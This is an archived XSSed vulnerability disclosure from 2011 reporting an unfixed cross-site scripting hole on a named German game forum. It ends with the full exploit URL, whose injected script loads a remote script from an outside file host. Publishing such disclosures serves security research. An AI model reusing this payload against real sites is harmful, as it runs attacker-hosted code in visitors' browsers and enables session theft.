Unfixed XSS vulnerability at de.forum.gpotato.eu

2011-12-28T00:00:00
ID XSSED:75094
Type xssed
Reporter crucki
Modified 2011-12-28T00:00:00

Description

Security researcher crucki submitted, on 28/12/2011, a cross-site scripting (XSS) vulnerability affecting de.forum.gpotato.eu, which at the time of submission ranked 12089 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 28/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://de.forum.gpotato.eu/Common/Aspx/ImageUpload/ImageUploadType1.asp?FCD=%22%3E%3Cscript%3Es=%22http://ompldr.org/vYnhqbw%22;r=%22\40%22;document.write%28%27%3Cscript%27+r+%27src%27+%27=%27+s+%27%3E\%3C\/script\%3E%27%29%3C/script%3E